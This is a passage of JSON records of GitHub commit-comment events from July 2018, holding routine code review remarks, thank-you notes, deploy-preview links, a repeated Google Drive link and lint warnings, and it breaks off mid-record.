{"id":"8041397424","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/hello-world"},"payload":{"comment":{"id":29897046,"position":null,"line":null,"path":null,"commit_id":"fd52a648bccd162c042ffd4cab66dc34d870b592","created_at":"2018-07-31T02:42:04Z","updated_at":"2018-07-31T02:42:04Z","author_association":"OWNER","body":"https://drive.google.com/file/d/1ioID4JH3XZqvhS2yYTIxB24-_Sbq4DKk/view?usp=drivesdk"}},"created_at":"2018-07-31T02:42:04Z"}
{"id":"8041399756","type":"CommitCommentEvent","actor":{"login":"soyanakagawa"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29897049,"position":null,"line":null,"path":null,"commit_id":"892212bad2daadd373f4be241e4cd9889b0a1005","created_at":"2018-07-31T02:42:58Z","updated_at":"2018-07-31T02:42:58Z","author_association":"NONE","body":"Thanks!"}},"created_at":"2018-07-31T02:42:58Z"}
{"id":"8041400821","type":"CommitCommentEvent","actor":{"login":"jlcarvalho"},"repo":{"name":"Futuring/futuring.com.br"},"payload":{"comment":{"id":29897050,"position":null,"line":null,"path":null,"commit_id":"109f6acf6657bfcbd84b782446d31567702f3b6c","created_at":"2018-07-31T02:43:21Z","updated_at":"2018-07-31T02:43:21Z","author_association":"CONTRIBUTOR","body":"\n<h3>Update Filesquash Version to 0.6.2</h3>\nDemo: <strong><a href='https://futuring-auhyngtygi.now.sh' target='_blank'>https://futuring-auhyngtygi.now.sh</a></strong>\n"}},"created_at":"2018-07-31T02:43:21Z"}
{"id":"8041401483","type":"CommitCommentEvent","actor":{"login":"elliscwc"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29897054,"position":null,"line":null,"path":null,"commit_id":"892212bad2daadd373f4be241e4cd9889b0a1005","created_at":"2018-07-31T02:43:38Z","updated_at":"2018-07-31T02:43:38Z","author_association":"NONE","body":"thank you 💛 "}},"created_at":"2018-07-31T02:43:38Z"}
{"id":"8041403416","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/hello-world"},"payload":{"comment":{"id":29897059,"position":null,"line":null,"path":null,"commit_id":"fd52a648bccd162c042ffd4cab66dc34d870b592","created_at":"2018-07-31T02:44:25Z","updated_at":"2018-07-31T02:44:25Z","author_association":"OWNER","body":"https://drive.google.com/file/d/1ioID4JH3XZqvhS2yYTIxB24-_Sbq4DKk/view?usp=drivesdk"}},"created_at":"2018-07-31T02:44:25Z"}
{"id":"8041405564","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/hello-world"},"payload":{"comment":{"id":29897063,"position":null,"line":null,"path":null,"commit_id":"fd52a648bccd162c042ffd4cab66dc34d870b592","created_at":"2018-07-31T02:45:14Z","updated_at":"2018-07-31T02:45:14Z","author_association":"OWNER","body":"https://drive.google.com/file/d/1ioID4JH3XZqvhS2yYTIxB24-_Sbq4DKk/view?usp=drivesdk"}},"created_at":"2018-07-31T02:45:14Z"}
{"id":"8041409782","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/hello-world"},"payload":{"comment":{"id":29897068,"position":null,"line":null,"path":null,"commit_id":"fd52a648bccd162c042ffd4cab66dc34d870b592","created_at":"2018-07-31T02:46:48Z","updated_at":"2018-07-31T02:46:48Z","author_association":"OWNER","body":"https://drive.google.com/file/d/1ioID4JH3XZqvhS2yYTIxB24-_Sbq4DKk/view?usp=drivesdk"}},"created_at":"2018-07-31T02:46:48Z"}
{"id":"8041411479","type":"CommitCommentEvent","actor":{"login":"webvictim"},"repo":{"name":"kaniini/antissh"},"payload":{"comment":{"id":29897070,"position":5,"line":8,"path":"antissh.conf.example","commit_id":"f6a3985fb6f24cb87ee8dfe3f013c29363cc11d6","created_at":"2018-07-31T02:47:26Z","updated_at":"2018-07-31T02:47:26Z","author_association":"NONE","body":"Fair enough. Having some issues where the gline command doesn’t run\nproperly and trying to figure out what was causing it. Probably not this\nthen.\n\nOn Mon, 30 Jul 2018 at 23:38, William Pitcock <notifications@github.com>\nwrote:\n\n> nah, it turns out its not needed\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kaniini/antissh/commit/f6a3985fb6f24cb87ee8dfe3f013c29363cc11d6#commitcomment-29897022>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA2zHWwrixtwPe6yVAblyBA-LFMaSo5rks5uL8MKgaJpZM4VmPg->\n> .\n>\n"}},"created_at":"2018-07-31T02:47:26Z"}
{"id":"8041412912","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/hello-world"},"payload":{"comment":{"id":29897072,"position":null,"line":null,"path":null,"commit_id":"fd52a648bccd162c042ffd4cab66dc34d870b592","created_at":"2018-07-31T02:47:59Z","updated_at":"2018-07-31T02:47:59Z","author_association":"OWNER","body":"https://drive.google.com/file/d/1ioID4JH3XZqvhS2yYTIxB24-_Sbq4DKk/view?usp=drivesdk \r\n"}},"created_at":"2018-07-31T02:47:59Z"}
{"id":"8041414216","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/hello-world"},"payload":{"comment":{"id":29897074,"position":null,"line":null,"path":null,"commit_id":"fd52a648bccd162c042ffd4cab66dc34d870b592","created_at":"2018-07-31T02:48:29Z","updated_at":"2018-07-31T02:48:29Z","author_association":"OWNER","body":"https://drive.google.com/file/d/1ioID4JH3XZqvhS2yYTIxB24-_Sbq4DKk/view?usp=drivesdk"}},"created_at":"2018-07-31T02:48:29Z"}
{"id":"8041415815","type":"CommitCommentEvent","actor":{"login":"watanabeyu"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29897078,"position":null,"line":null,"path":null,"commit_id":"892212bad2daadd373f4be241e4cd9889b0a1005","created_at":"2018-07-31T02:49:06Z","updated_at":"2018-07-31T02:49:06Z","author_association":"NONE","body":"thanks"}},"created_at":"2018-07-31T02:49:06Z"}
{"id":"8041415915","type":"CommitCommentEvent","actor":{"login":"jlcarvalho"},"repo":{"name":"Futuring/futuring.com.br"},"payload":{"comment":{"id":29897080,"position":null,"line":null,"path":null,"commit_id":"adde589f1919d445ee9f3961c974f3db48015e89","created_at":"2018-07-31T02:49:09Z","updated_at":"2018-07-31T02:49:09Z","author_association":"CONTRIBUTOR","body":"\n<h3>Add link rel preconnect to unpkg and filesquash</h3>\nDemo: <strong><a href='https://futuring-cziyllajid.now.sh' target='_blank'>https://futuring-cziyllajid.now.sh</a></strong>\n"}},"created_at":"2018-07-31T02:49:09Z"}
{"id":"8041417983","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/hello-world"},"payload":{"comment":{"id":29897085,"position":null,"line":null,"path":null,"commit_id":"fd52a648bccd162c042ffd4cab66dc34d870b592","created_at":"2018-07-31T02:49:57Z","updated_at":"2018-07-31T02:49:57Z","author_association":"OWNER","body":"https://drive.google.com/file/d/1ioID4JH3XZqvhS2yYTIxB24-_Sbq4DKk/view?usp=drivesdk"}},"created_at":"2018-07-31T02:49:57Z"}
{"id":"8041425799","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29897088,"position":1,"line":null,"path":"1533005567.54/github_test.txt","commit_id":"12f50e68c80411efa865a2f5f2128d580a67a460","created_at":"2018-07-31T02:52:49Z","updated_at":"2018-07-31T02:52:49Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-31T02:52:49Z"}
{"id":"8041432219","type":"CommitCommentEvent","actor":{"login":"itzg"},"repo":{"name":"itzg/dockerfiles"},"payload":{"comment":{"id":29897100,"position":null,"line":null,"path":null,"commit_id":"848cd8b994bba2902e2a2f48bf616b9bfa107800","created_at":"2018-07-31T02:55:09Z","updated_at":"2018-07-31T02:55:09Z","author_association":"OWNER","body":"Fixes #213 "}},"created_at":"2018-07-31T02:55:09Z"}
{"id":"8041434353","type":"CommitCommentEvent","actor":{"login":"sricharanrache"},"repo":{"name":"sricharanrache/myrepository"},"payload":{"comment":{"id":29897104,"position":null,"line":null,"path":null,"commit_id":"767e2400240d4af5e99cb2739c832c5bd32d5f6a","created_at":"2018-07-31T02:55:57Z","updated_at":"2018-07-31T02:55:57Z","author_association":"OWNER","body":"d"}},"created_at":"2018-07-31T02:55:57Z"}
{"id":"8041439138","type":"CommitCommentEvent","actor":{"login":"RikuNoctis"},"repo":{"name":"roahnosh/vitacheat"},"payload":{"comment":{"id":29897111,"position":null,"line":null,"path":null,"commit_id":"3147db57e9d735c771d2ca6892c5814a828685de","created_at":"2018-07-31T02:57:45Z","updated_at":"2018-07-31T02:57:45Z","author_association":"NONE","body":"While I am not koiL90, I suggest you check github's features first before posting anywhere.\r\nCheck the repository itself, and you could make an \"issue\" stating your request [here](https://github.com/roahnosh/vitacheat/issues), like some other people have done recently.\r\n\r\nI don't know of koiL90 will do what you want, but you can at least try. Do note that he states in his repository that the codes are for the games he is actually interested in, so it's not like he is taking requests."}},"created_at":"2018-07-31T02:57:45Z"}
{"id":"8041439397","type":"CommitCommentEvent","actor":{"login":"QuLogic"},"repo":{"name":"jeroen/openssl"},"payload":{"comment":{"id":29897113,"position":4,"line":10,"path":"NEWS","commit_id":"6570beaa960f15ef409f1cd50298690a2c0dc3a3","created_at":"2018-07-31T02:57:51Z","updated_at":"2018-07-31T02:57:51Z","author_association":"NONE","body":"There seems to be duplicate entries for 1.0.1 and 1.0.2."}},"created_at":"2018-07-31T02:57:51Z"}
{"id":"8041440653","type":"CommitCommentEvent","actor":{"login":"colinator27"},"repo":{"name":"colinator27/open-day-dialogue-editor"},"payload":{"comment":{"id":29897114,"position":null,"line":null,"path":null,"commit_id":"f39d5e416b218d529986708c7550cf13a607637c","created_at":"2018-07-31T02:58:19Z","updated_at":"2018-07-31T02:58:19Z","author_association":"OWNER","body":"Fixes #1 and #2 "}},"created_at":"2018-07-31T02:58:19Z"}
{"id":"8041441852","type":"CommitCommentEvent","actor":{"login":"Psiale"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29897118,"position":null,"line":null,"path":null,"commit_id":"534b9a382dc0aaab47a87a808e101b3bdc8073c3","created_at":"2018-07-31T02:58:49Z","updated_at":"2018-07-31T02:58:49Z","author_association":"NONE","body":"@Fatma255 I have same issue, try changing the name of the id list on every xml ( for example phrases list = listP) and change it on the java file too ListView listView = (ListView) findViewById(R.id.listP);"}},"created_at":"2018-07-31T02:58:49Z"}
{"id":"8041444278","type":"CommitCommentEvent","actor":{"login":"dimaLytvyniuk"},"repo":{"name":"dimaLytvyniuk/ScalaLearning"},"payload":{"comment":{"id":29897121,"position":14,"line":14,"path":"Hortsman/src/Part5/BankAccount.scala","commit_id":"2c9b9bb6c668cc20c55619950e57b238e036e4c1","created_at":"2018-07-31T02:59:46Z","updated_at":"2018-07-31T02:59:46Z","author_association":"OWNER","body":"Thanks"}},"created_at":"2018-07-31T02:59:46Z"}
{"id":"8041444381","type":"CommitCommentEvent","actor":{"login":"terrose"},"repo":{"name":"terrose/MPESA-API"},"payload":{"comment":{"id":29897122,"position":null,"line":null,"path":null,"commit_id":"af79889adbf95e5938e6c3d447cdc83ba3d5d54c","created_at":"2018-07-31T02:59:48Z","updated_at":"2018-07-31T02:59:48Z","author_association":"OWNER","body":"[_212360x89.pdf](https://github.com/terrose/MPESA-API/files/2243607/_212360x89.pdf)\r\n"}},"created_at":"2018-07-31T02:59:48Z"}
{"id":"8046348697","type":"CommitCommentEvent","actor":{"login":"fildunsky"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29910692,"position":null,"line":null,"path":null,"commit_id":"3dd73de76669892f9c4a11536fd0363f55ff7a99","created_at":"2018-07-31T20:00:35Z","updated_at":"2018-07-31T20:00:35Z","author_association":"MEMBER","body":"I love it! More modern look!"}},"created_at":"2018-07-31T20:00:35Z"}
{"id":"8046348761","type":"CommitCommentEvent","actor":{"login":"graphluna"},"repo":{"name":"graphluna/GraphLuna"},"payload":{"comment":{"id":29910693,"position":null,"line":null,"path":null,"commit_id":"52d9c03bc99e4e1473f2469c278cb34315058982","created_at":"2018-07-31T20:00:35Z","updated_at":"2018-07-31T20:00:35Z","author_association":"OWNER","body":"Faltan arreglos en galeria\r\n"}},"created_at":"2018-07-31T20:00:35Z"}
{"id":"8046357413","type":"CommitCommentEvent","actor":{"login":"mhallin"},"repo":{"name":"mhallin/graphql_ppx"},"payload":{"comment":{"id":29910713,"position":null,"line":null,"path":null,"commit_id":"f909e49620b6c005fb1ffa03a1a1749e93ec61a2","created_at":"2018-07-31T20:02:20Z","updated_at":"2018-07-31T20:02:20Z","author_association":"OWNER","body":"Since different platforms treat line endings differently, the standard C libraries provided a way of opening files in \"text\" and \"binary\" modes. In text mode, line ending conversions would take place so that a program behaved the same on Windows (where a line is terminated with `\\r\\n`) or Unix/Linux (only `\\n`). When dealing with binary files however, you don't want _any_ translation to take place, so you need to open those files in binary mode to prevent line ending conversion.\r\n\r\nBecause `\\n` is considered the standard, Unix/Linux will not perform any line ending conversion in text mode, so there's no practical difference between those two modes there."}},"created_at":"2018-07-31T20:02:20Z"}
{"id":"8046361756","type":"CommitCommentEvent","actor":{"login":"forkoz"},"repo":{"name":"p3p/Marlin"},"payload":{"comment":{"id":29910727,"position":null,"line":null,"path":null,"commit_id":"b5447f5b71a890144228cb34b9422b19e66d7cde","created_at":"2018-07-31T20:03:08Z","updated_at":"2018-07-31T20:03:08Z","author_association":"NONE","body":"I see the file is gone from the folders. I was thinking it would work the same way as it does now and block pins when a serial port is defined."}},"created_at":"2018-07-31T20:03:08Z"}
{"id":"8046364566","type":"CommitCommentEvent","actor":{"login":"ricaff"},"repo":{"name":"ricaff/test-git"},"payload":{"comment":{"id":29910742,"position":4,"line":8,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-31T20:03:41Z","updated_at":"2018-07-31T20:03:41Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-31T20:03:41Z"}
{"id":"8046365635","type":"CommitCommentEvent","actor":{"login":"ricaff"},"repo":{"name":"ricaff/test-git"},"payload":{"comment":{"id":29910744,"position":1,"line":5,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-31T20:03:54Z","updated_at":"2018-07-31T20:03:54Z","author_association":"OWNER","body":"Sure?"}},"created_at":"2018-07-31T20:03:54Z"}
{"id":"8046368166","type":"CommitCommentEvent","actor":{"login":"jhinkey"},"repo":{"name":"liferay/liferay-docs"},"payload":{"comment":{"id":29910753,"position":30,"line":19,"path":"discover/portal/articles/140-workflow/04-reviewing-assets.markdown","commit_id":"0288d08f57a231759866b6c072ac8452891dec50","created_at":"2018-07-31T20:04:25Z","updated_at":"2018-07-31T20:04:25Z","author_association":"MEMBER","body":"Great. I changed it and will put it in my next merge."}},"created_at":"2018-07-31T20:04:25Z"}
{"id":"8046370563","type":"CommitCommentEvent","actor":{"login":"DylanFPS"},"repo":{"name":"SIVAbot/SIVA"},"payload":{"comment":{"id":29910756,"position":6,"line":7,"path":"SIVA/Core/Files/Objects/DiscordUser.cs","commit_id":"47f26e41e5f0b8ccfe3f17c9cf37df69fdfb4218","created_at":"2018-07-31T20:04:55Z","updated_at":"2018-07-31T20:04:55Z","author_association":"MEMBER","body":"Lmk if this works. I remember JSON.NET not liking it when get and set isn't public"}},"created_at":"2018-07-31T20:04:55Z"}
{"id":"8046373141","type":"CommitCommentEvent","actor":{"login":"abankrah"},"repo":{"name":"abankrah/Data_Science_Assignment_12.11287_Data_Cleaning"},"payload":{"comment":{"id":29910765,"position":null,"line":null,"path":null,"commit_id":"f617cab28730309e6f4bfe78800a39f5962fcbd1","created_at":"2018-07-31T20:05:28Z","updated_at":"2018-07-31T20:05:28Z","author_association":"OWNER","body":"![question_1](https://user-images.githubusercontent.com/39193389/43484150-88aef320-94db-11e8-98c8-7269327f6440.PNG)\r\n![question_2](https://user-images.githubusercontent.com/39193389/43484151-88bd4c86-94db-11e8-811f-2465c87ec3f4.PNG)\r\n![question_3](https://user-images.githubusercontent.com/39193389/43484152-88cdd18c-94db-11e8-8a17-9e19fc8864ec.PNG)\r\n![question_4](https://user-images.githubusercontent.com/39193389/43484153-88dbdf84-94db-11e8-9918-35386567090f.PNG)\r\n![question_5](https://user-images.githubusercontent.com/39193389/43484154-88ee2d06-94db-11e8-8db6-b3202089b7c1.PNG)\r\n"}},"created_at":"2018-07-31T20:05:28Z"}
{"id":"8046384125","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29910779,"position":5,"line":5,"path":"listen2/number_day_of_year.rb","commit_id":"0c43be28a43373025dbf6154fd0b2c521321a6e7","created_at":"2018-07-31T20:07:39Z","updated_at":"2018-07-31T20:07:39Z","author_association":"NONE","body":"А почему в январе 30 дней? Вроде всегда 31 было."}},"created_at":"2018-07-31T20:07:39Z"}
{"id":"8046387312","type":"CommitCommentEvent","actor":{"login":"markusthoemmes"},"repo":{"name":"apache/incubator-openwhisk-deploy-kube"},"payload":{"comment":{"id":29910784,"position":5,"line":58,"path":"helm/openwhisk/templates/invoker.yaml","commit_id":"da768898f0a06e0cbcb19a144c60942fba17429a","created_at":"2018-07-31T20:08:18Z","updated_at":"2018-07-31T20:08:18Z","author_association":"NONE","body":"This needs to be `INVOKER_NAME`, `COMPONENT_NAME` is not unique in the sense of: we want uniqueness per host I believe? @dgrove-oss "}},"created_at":"2018-07-31T20:08:18Z"}
{"id":"8046388285","type":"CommitCommentEvent","actor":{"login":"ryungo"},"repo":{"name":"ryungo/hello-world"},"payload":{"comment":{"id":29910787,"position":null,"line":null,"path":null,"commit_id":"015b389d08af5336571e7a1d6436034316d4d1d2","created_at":"2018-07-31T20:08:30Z","updated_at":"2018-07-31T20:08:30Z","author_association":"OWNER","body":"Write a commit message that describes your changes."}},"created_at":"2018-07-31T20:08:30Z"}
{"id":"8046393230","type":"CommitCommentEvent","actor":{"login":"StevenJobenson"},"repo":{"name":"StevenJobenson/garrysmod"},"payload":{"comment":{"id":29910803,"position":60,"line":53,"path":"garrysmod/lua/includes/modules/constraint.lua","commit_id":"92535eabd421a90cf0c72d28838f6ad20b84a95e","created_at":"2018-07-31T20:09:30Z","updated_at":"2018-07-31T20:09:30Z","author_association":"OWNER","body":"This function was run every time a constraint was created and for seemingly no reason would iterate through every entity in a constraint system and count up the total entities. If a large contraption is spawned with duplicator this can result in thousands of iterations over every entity for no purpose.\r\n\r\nThis being removed could significantly reduce the lag of contraptions being spawned in."}},"created_at":"2018-07-31T20:09:30Z"}
{"id":"8046396926","type":"CommitCommentEvent","actor":{"login":"AndreasIhlein"},"repo":{"name":"AndreasIhlein/Test"},"payload":{"comment":{"id":29910817,"position":null,"line":null,"path":null,"commit_id":"68f6b6824cb0b096a90e98e3729c9b3b50dbf19b","created_at":"2018-07-31T20:10:15Z","updated_at":"2018-07-31T20:10:15Z","author_association":"OWNER","body":"0"}},"created_at":"2018-07-31T20:10:15Z"}
{"id":"8046400772","type":"CommitCommentEvent","actor":{"login":"Deandun"},"repo":{"name":"Deandun/NINARow"},"payload":{"comment":{"id":29910838,"position":26,"line":28,"path":"NINARow/src/Logic/Logic.java","commit_id":"f0fe11d5083fd2d9f93aa2cb977316b14d51ba28","created_at":"2018-07-31T20:11:02Z","updated_at":"2018-07-31T20:11:02Z","author_association":"OWNER","body":"Game board init moved to \"startGame\" function"}},"created_at":"2018-07-31T20:11:02Z"}
{"id":"8046405006","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29910846,"position":null,"line":null,"path":null,"commit_id":"3c3dcd9c2e230bab86f6e92137bb9d07354371b5","created_at":"2018-07-31T20:11:54Z","updated_at":"2018-07-31T20:11:54Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1166](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1166).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1166-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-31T20:11:54Z"}
{"id":"8046405147","type":"CommitCommentEvent","actor":{"login":"Deandun"},"repo":{"name":"Deandun/NINARow"},"payload":{"comment":{"id":29910847,"position":36,"line":35,"path":"NINARow/src/Logic/Logic.java","commit_id":"f0fe11d5083fd2d9f93aa2cb977316b14d51ba28","created_at":"2018-07-31T20:11:56Z","updated_at":"2018-07-31T20:11:56Z","author_association":"OWNER","body":"Need to move this into the if statement bellow"}},"created_at":"2018-07-31T20:11:56Z"}
{"id":"8046405694","type":"CommitCommentEvent","actor":{"login":"davidedc"},"repo":{"name":"pabloahb/Algebrite"},"payload":{"comment":{"id":29910848,"position":null,"line":null,"path":null,"commit_id":"06ba764949e66e7df5f24eac8f926b685a8f45d8","created_at":"2018-07-31T20:12:02Z","updated_at":"2018-07-31T20:12:02Z","author_association":"NONE","body":"I'm okaying with this, seems like there is one complication: if you have variables in a definition, for example like in myVar2 below (where := is the \"quoted assignment\" that doesn't evaluate the right side)\r\n\r\n```\r\nmyVar = 5\r\nmyVar2 := myVar\r\n```\r\n\r\nthen get_symbols_as_strings() gives:\r\n\r\n```\r\n{symbol: \"myVar\", script: \"myVar=5\"}\r\n{symbol: \"myVar2\", script: \"myVar2=myVar\"}\r\n```\r\n\r\nwhen one then does set_symbols_from_strings, the result is that\r\n\r\n```\r\nmyVar = 5\r\nmyVar2 = 5\r\n```\r\n\r\nIn other words, myVar2 is not 'myVar' anymore, but rather its value.\r\nMAYBE the solution is that the scripts should all be with ```:=``` i.e.\r\n\r\n```\r\n{symbol: \"myVar\", script: \"myVar := 5\"}\r\n{symbol: \"myVar2\", script: \"myVar2 := myVar\"}\r\n```\r\n\r\nany thoughts?\r\n\r\n(Also: have you got some test cases for this functionality so I can start with those and add mine?)"}},"created_at":"2018-07-31T20:12:02Z"}
{"id":"8046408248","type":"CommitCommentEvent","actor":{"login":"garbear"},"repo":{"name":"wsnipex/xbmc"},"payload":{"comment":{"id":29910858,"position":20,"line":80,"path":"cmake/modules/FindFlatBuffers.cmake","commit_id":"46527b86db329fdae03607960fa9b8def3b98df7","created_at":"2018-07-31T20:12:31Z","updated_at":"2018-07-31T20:12:31Z","author_association":"NONE","body":"agreed, single directory is fine. We should make it generic though instead of a retroplayer folder. Can you make this change?"}},"created_at":"2018-07-31T20:12:31Z"}
{"id":"8046411534","type":"CommitCommentEvent","actor":{"login":"mrhdigital"},"repo":{"name":"mrhdigital/Project2"},"payload":{"comment":{"id":29910861,"position":null,"line":null,"path":null,"commit_id":"5725f3c22bb96a0c2d6256f46586252e38193b95","created_at":"2018-07-31T20:13:08Z","updated_at":"2018-07-31T20:13:08Z","author_association":"OWNER","body":"working demo"}},"created_at":"2018-07-31T20:13:08Z"}
{"id":"8046411852","type":"CommitCommentEvent","actor":{"login":"ssorj"},"repo":{"name":"alanconway/qpid-proton"},"payload":{"comment":{"id":29910862,"position":16,"line":16,"path":"docs/connect_configuation.md","commit_id":"c30911617e39e8dbcb71a501b9deb5ff988f687d","created_at":"2018-07-31T20:13:11Z","updated_at":"2018-07-31T20:13:11Z","author_association":"NONE","body":"I don't object to the extra structure.  I'm not yet clear on why we need URL schemes."}},"created_at":"2018-07-31T20:13:11Z"}
{"id":"8046411946","type":"CommitCommentEvent","actor":{"login":"Deandun"},"repo":{"name":"Deandun/NINARow"},"payload":{"comment":{"id":29910863,"position":66,"line":50,"path":"NINARow/src/Logic/Logic.java","commit_id":"f0fe11d5083fd2d9f93aa2cb977316b14d51ba28","created_at":"2018-07-31T20:13:12Z","updated_at":"2018-07-31T20:13:12Z","author_association":"OWNER","body":"Removed try/catch, only need to catch in UI"}},"created_at":"2018-07-31T20:13:12Z"}
{"id":"8046414028","type":"CommitCommentEvent","actor":{"login":"richelbilderbeek"},"repo":{"name":"richelbilderbeek/DAISIE"},"payload":{"comment":{"id":29910866,"position":null,"line":null,"path":null,"commit_id":"b02aa74149c2acf1405c745b6f7230b7483fc2bc","created_at":"2018-07-31T20:13:35Z","updated_at":"2018-07-31T20:13:35Z","author_association":"OWNER","body":"Hi @Neves-P : It worked! I already merged your work with `develop`. We did it!"}},"created_at":"2018-07-31T20:13:35Z"}
{"id":"8046414718","type":"CommitCommentEvent","actor":{"login":"WMX567"},"repo":{"name":"WMX567/Research-models-results-tools"},"payload":{"comment":{"id":29910868,"position":null,"line":null,"path":null,"commit_id":"9885516e4181dc3acf47779248de75bc03ea9af4","created_at":"2018-07-31T20:13:44Z","updated_at":"2018-07-31T20:13:44Z","author_association":"OWNER","body":"Already import os"}},"created_at":"2018-07-31T20:13:44Z"}
{"id":"8046416812","type":"CommitCommentEvent","actor":{"login":"Deandun"},"repo":{"name":"Deandun/NINARow"},"payload":{"comment":{"id":29910879,"position":126,"line":104,"path":"NINARow/src/Logic/Logic.java","commit_id":"f0fe11d5083fd2d9f93aa2cb977316b14d51ba28","created_at":"2018-07-31T20:14:10Z","updated_at":"2018-07-31T20:14:10Z","author_association":"OWNER","body":"Combined the functions we call after a player finished his turn"}},"created_at":"2018-07-31T20:14:10Z"}
{"id":"8046424874","type":"CommitCommentEvent","actor":{"login":"ssorj"},"repo":{"name":"alanconway/qpid-proton"},"payload":{"comment":{"id":29910895,"position":16,"line":16,"path":"docs/connect_configuation.md","commit_id":"c30911617e39e8dbcb71a501b9deb5ff988f687d","created_at":"2018-07-31T20:15:45Z","updated_at":"2018-07-31T20:15:45Z","author_association":"NONE","body":"To put a finer point on it: proton happens to use connection URLs, but that's not (in my view) essential to this shared config info.  It needs to be sufficient to create proton connection URLs, but it need not have the same attributes as a connection URL."}},"created_at":"2018-07-31T20:15:45Z"}
{"id":"8046425353","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.shiny"},"payload":{"comment":{"id":29910897,"position":null,"line":null,"path":null,"commit_id":"855974f7dad926f80e934781db6800bb1b6fd20f","created_at":"2018-07-31T20:15:50Z","updated_at":"2018-07-31T20:15:50Z","author_association":"NONE","body":"[inst/examples/example-slicer.R:8:1:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/inst/examples/example-slicer.R#L8) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​DT <- reactive({\n^~\n```\n[R/generator.R:107:4:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/generator.R#L107) *style:* **Commented code should be removed.**\n```r\n​  #ns <- NS(id)\n   ^~~~~~~~~~~~\n```\n[R/generator.R:111:4:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/generator.R#L111) *style:* **Commented code should be removed.**\n```r\n​  #tabContent <- paste0(module$name, \"UI(\\\"\", ns(module$id), \"\\\"\", parameters, \")\")\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generator.R:208:4:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/generator.R#L208) *style:* **Commented code should be removed.**\n```r\n​  #ns <- NS(id)\n   ^~~~~~~~~~~~\n```\n[R/generator.R:212:4:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/generator.R#L212) *style:* **Commented code should be removed.**\n```r\n​  #callModuleDirective <- paste0(\"callModule(\", name, \", \\\"\", ns(id), \"\\\"\", renderedParameters, \")\")\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/histogramForRaster.R:76:9:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/histogramForRaster.R#L76) *style:* **Commented code should be removed.**\n```r\n​    #   numeric()\n        ^~~~~~~~~\n```\n[R/histogramForRaster.R:78:9:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/histogramForRaster.R#L78) *style:* **Commented code should be removed.**\n```r\n​    #   ras[]\n        ^~~~~\n```\n[R/rastersOverTime.R:127:37:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/rastersOverTime.R#L127) *style:* **Commented code should be removed.**\n```r\n​  tilesGroup <- \"Time since fire\" # session$ns(\"tiles\")\n                                    ^~~~~~~~~~~~~~~~~~~\n```\n[R/rastersOverTime.R:134:37:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/rastersOverTime.R#L134) *style:* **Commented code should be removed.**\n```r\n​  tilesGroup <- \"Time since fire\" # session$ns(\"tiles\")\n                                    ^~~~~~~~~~~~~~~~~~~\n```\n[R/rastersOverTime.R:145:6:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/rastersOverTime.R#L145) *style:* **Commented code should be removed.**\n```r\n​    #grep(rasterFilename, gsub(\"www/\", \"\", rctUrlTemplate()), value = TRUE)\n     